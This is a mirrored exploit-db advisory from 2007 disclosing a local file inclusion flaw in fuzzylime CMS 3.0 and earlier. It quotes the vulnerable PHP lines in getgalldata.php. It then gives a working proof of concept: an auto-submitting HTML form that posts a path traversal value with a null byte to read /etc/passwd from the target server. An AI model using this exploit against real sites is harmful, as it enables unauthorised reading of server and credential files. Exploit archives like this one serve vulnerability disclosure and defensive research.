bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4378.html
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

62 lines
No EOL
1.6 KiB
HTML
Raw Blame History

########################################################################
#################
#
# not sec group
# http://www.notsec.com info@notsec.com
#
#
# [fuzzylime (cms) <= 3.0]
#
# Class: Local File Inclusion
# Found: 08/09/2007
# Site: http://cms.fuzzylime.co.uk/
#Download: http://cms.fuzzylime.co.uk/files/cms.zip
#Author: [wHITe_ShEEp] of notsec
#Contact: white_sheep@notsec.com - http://www.notsec.com
#
########################################################################
#################
vulnerable code:
[cms]/code/getgalldata.php
______________________________________________________
1: <?
2: $p = $_POST[p];
3: $m = $_POST[img];
4: $m = "e$m";
5: $entrytype = "gallery";
6: include "../gallery/$p.inc.php";
7: include "settings.inc.php";
8: include "../$admindir/languages/english.inc.php";
...
41: ?>
_______________________________________________________
Exploit: ( Work only with magic_quotes_gpc = Off )
_______________________________________________________
<html>
<body onload="document.myform.submit()">
<form name="myform" action="http://www.site.com/[fuzzylime]/code/
getgalldata.php" method="post">
<input name="p" type="text" size="30" value="../../../../../../../../
etc/passwd%00" />
</form>
</html>
________________________________________________________
Thanks to:
________________________________________________________
All notsec.com members;
r00t for testing;
________________________________________________________
# milw0rm.com [2007-09-08]
Reference in a new issue View git blame Copy permalink